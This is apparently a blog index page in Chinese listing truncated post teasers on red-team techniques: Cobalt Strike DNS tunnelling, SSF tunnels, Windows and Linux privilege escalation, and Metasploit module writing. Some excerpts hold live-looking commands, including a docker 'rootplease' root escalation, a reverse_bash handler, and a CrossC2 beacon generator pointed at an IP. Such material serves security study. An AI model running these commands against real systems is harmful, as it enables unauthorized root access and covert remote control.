cobaltstrike dns隧道的上线 基础要理解cobaltstrike dns隧道的上线过程,首先要理解dns协议。 Domain Name System,dns是域名系统的缩写。默认使用的是53端口。 dns隧道使用的场景是在一个严格的内网环境,安全设备或者策略不允许其他端口出网,但是使用nslookup命令,发现可以使用dns协议,可以向外部的dns服务器发送请求,来进行外部域名解析。 外部域名解析也就是一个域名转换为IP的行为 2021-02-05 cobaltstrike cobaltstrike
ssf反向动态转发与正向的区别&反弹shell 正向动态转发(要访问的是ssfd服务端的网络)当我们要去连接内网的时候,可以直接访问到 ssf服务端设置(访问这个网络) 123456./ssfd -p 1080python -m SimpleHTTPServer 8000wget -r http://192.168.28.148:8000/ssfssf客户端设置:./ssf -D 1089 -p 8080 VPS-IP 反向动态转发(要访问的是 2021-01-30 tools tools
windows提权导航页 windows内核漏洞windows内核漏洞提权教程windows内核提权 windows服务 DLLHijack 无引号服务路径提权 windows本地提权之命名管道 服务提权之注册表提权 windows服务漏洞之可执行文件 windows服务漏洞之binpath提权 密码挖掘提权(跳过)注册表 autorun 总是以管理员权限安装的提权 计划任务计划任务的提权 UAC bypass待更新 2021-01-03 windows windows
ssf隧道 引子当你凝视深渊的时候,深渊也在凝视着你。 环境 ssf隧道录制的视频: SSF反向端口转发&动态转发 多层内网隧道-SSF正向端口转发 socket 套接字是什么 带着问题去思考,何为正向,何为反向正向端口转发步骤一: 服务端执行: upx-ssfd.exe -p 1080 服务端开启1080端口,进行监听 客户端执行: ssf -D 9000 -p 1080 172.20.1 2021-01-03 tools tools
一期纯粹的软件推荐文章 文件相关文本编辑 https://notepad-plus-plus.org/downloads/ markdown文档编辑器 https://hemashushu.github.io/yu-writer.site/优点是界面设计优秀,好看好用 https://typora.io/ https://github.com/jgm/pandoc优点是插件多:支持markdown转docx格式 2021-01-02 tools tools
01-msf的exp模块 分为4个部分 class 定义类,导入的msf的类,叫mixins include 导入函数库 初始化,定义参数,模块的值 定义要执行的exp 如果语法写错了,可以在日志里看: /root/.msf4/logs/framework.log 写的demo,作用是调用tcp模块,进行ftp连接12345678910111213141516171819202122232425262728 2020-12-27 metasploit metasploit
02-建立一个新的session msf 建立一个新的sessionnew_session.rb作用是建立一个新的meterpreter session 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747 2020-12-26 metasploit metasploit
03-msf报错(SESSION may not be compatible) 起因:sudo -s提权在msf上一直报错,但是在靶机上是可以成功提权的。msf有一个模块,叫做post/multi/manage/sudo 看过这个模块的源码,就是使用sudo -s来提权的。 为什么会提权失败呢? 环境配置复现,debug设置msf监听handler -H 192.168.123.123 -P 6677 -p cmd/unix/reverse_bash 生成反弹shell的载荷 2020-12-22 metasploit metasploit
linux提权-msf提权插件编写中 linux提权-msf提权插件编写中 bob / secret docker组提权1docker run -v /:/linsecurity -i -t chrisfosterelli/rootplease nsf提权12345678910111213141516171819202122232425查看并挂载目录showmount -e 192.168.1.140mount 192.168.1.1 2020-12-19 linux linux
cobaltstrike的脚本(四) linux上线插件CrossC2录制的视频: CobaltStrike的插件 1234567891. src目录下,修改cna$CC2_PATH$CC2_BIN2. 添加证书.cobaltstrike.beacon_keys3. ./genCrossC2.Linux 18.163.137.185 6677 /root/tool/cobaltstrike/CrossC2-master/.cobalt 2020-12-12 cobaltstrike cobaltstrike